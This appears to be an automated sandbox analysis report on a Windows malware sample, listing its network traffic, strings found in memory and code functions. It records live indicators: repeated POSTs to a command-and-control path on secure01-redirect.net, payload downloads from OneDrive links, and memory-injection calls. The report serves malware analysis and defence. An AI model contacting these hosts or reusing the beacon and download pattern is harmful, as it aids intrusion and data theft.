    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24152226623.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436557196.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28437344760.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmp, lsass.exe, 00000006.00000002.28438780070.000001FB44233000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24170336576.000001FB44233000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24153671382.000001FB44233000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmp, lsass.exe, 00000006.00000002.28438780070.000001FB44233000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24170336576.000001FB44233000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24153671382.000001FB44233000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24152226623.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436557196.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28437344760.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
    Source: lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24152226623.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436557196.000001FB43A6F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28437344760.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
    Source: lsass.exe, 00000006.00000002.28439587316.000001FB442E2000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162551007.000001FB442E2000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24171105016.000001FB442E2000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24154425048.000001FB442E2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
    Source: lsass.exe, 00000006.00000002.28438475875.000001FB44200000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24170109761.000001FB44200000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
    Source: lsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
    Source: lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.di
    Source: lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28437344760.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: QVWb1n5OTH.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: QVWb1n5OTH.exeString found in binary or memory: http://s.symcd.com06
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
    Source: lsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/lt
    Source: lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
    Source: QVWb1n5OTH.exe, 00000004.00000002.28445110812.000000001E7C0000.00000004.00000001.sdmpString found in binary or memory: http://secure01-redirect.net/gb13/fre.php
    Source: QVWb1n5OTH.exe, 00000004.00000002.28445110812.000000001E7C0000.00000004.00000001.sdmpString found in binary or memory: http://secure01-redirect.net/gb13/fre.php:j
    Source: QVWb1n5OTH.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: QVWb1n5OTH.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: QVWb1n5OTH.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24160708651.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24169272516.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28437344760.000001FB43ACC000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
    Source: QVWb1n5OTH.exeString found in binary or memory: https://d.symcb.com/cps0%
    Source: QVWb1n5OTH.exeString found in binary or memory: https://d.symcb.com/rpa0
    Source: QVWb1n5OTH.exeString found in binary or memory: https://d.symcb.com/rpa0.
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpString found in binary or memory: https://erubbw.bl.files.1drv.com/
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpString found in binary or memory: https://erubbw.bl.files.1drv.com/Kf
    Source: QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpString found in binary or memory: https://erubbw.bl.files.1drv.com/y4mYud6ym_NJqaq22uaIor9GRHQ64LzKJki5GZymu2f7YS1D2FLOko-vkkGMGoXIJDV
    Source: QVWb1n5OTH.exe, 00000004.00000002.28437183390.00000000007FA000.00000004.00000020.sdmpString found in binary or memory: https://ervmpg.bl.files.1drv.com/
    Source: QVWb1n5OTH.exe, 00000004.00000002.28437183390.00000000007FA000.00000004.00000020.sdmpString found in binary or memory: https://ervmpg.bl.files.1drv.com/Q
    Source: QVWb1n5OTH.exe, 00000004.00000002.28436126707.000000000076C000.00000004.00000020.sdmpString found in binary or memory: https://ervmpg.bl.files.1drv.com/y4m-APER2p5Nb5FMLd_ybyQzx60L82xlgrG-sbtfretok1410vF9H862p1fC8MWInho
    Source: QVWb1n5OTH.exe, 00000004.00000003.24091064669.000000001E7D4000.00000004.00000001.sdmpString found in binary or memory: https://ervmpg.bl.files.1drv.com/y4mYPEwbzED-97xrx9n29fV7fSyD1fgGpzSF-jmJxyxzc1NPIYDEsZm2hHvKAjBl1ub
    Source: QVWb1n5OTH.exe, 00000004.00000003.24091497694.000000001EA40000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
    Source: QVWb1n5OTH.exe, 00000004.00000003.24091497694.000000001EA40000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
    Source: QVWb1n5OTH.exe, 00000004.00000003.24091497694.000000001EA40000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: QVWb1n5OTH.exe, 00000004.00000003.24091497694.000000001EA40000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
    Source: QVWb1n5OTH.exe, 00000004.00000002.28435771570.0000000000728000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: QVWb1n5OTH.exe, 00000004.00000002.28435771570.0000000000728000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/?
    Source: QVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21122&authkey=AD5G_ly
    Source: QVWb1n5OTH.exe, 00000004.00000002.28436126707.000000000076C000.00000004.00000020.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24086130674.000000001E7DA000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21123&authkey=AKpY_r2
    Source: QVWb1n5OTH.exe, 00000004.00000003.24076955216.00000000007F8000.00000004.00000001.sdmp, fabrika.exe.4.drString found in binary or memory: https://onedrive.live.com/viruswarning.aspx/fabrika.exe?cid=5a15fda1ae98540b&avres=I
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpString found in binary or memory: https://skydrive.live.com/
    Source: QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpString found in binary or memory: https://skydrive.live.com/redir.aspx?resid=5A15FDA1AE98540B%21122&avres=Infected&averror=SUCCESS&vin
    Source: lsass.exe, 00000006.00000000.24155874211.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28441251552.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24163871407.000001FB44435000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24156197415.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24162329581.000001FB442B0000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28440949415.000001FB44439000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24172775150.000001FB4447A000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24164205093.000001FB4447A000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 178Connection: close
    Source: unknownDNS traffic detected: queries for: onedrive.live.com

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: QVWb1n5OTH.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292A99
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022828E8
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022942DB
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228C52C
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02291C1A
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02280E1C
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228D013
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02281E62
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292674
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228A25A
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02285E55
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02281480
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02289AF9
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0229111F
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02284D67
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228474F
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_022863B7
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228139F
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292592
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292A99 NtWriteVirtualMemory,LoadLibraryA,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02293CE8 NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_02292674 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0229111F NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeCode function: 1_2_0228139F NtWriteVirtualMemory,
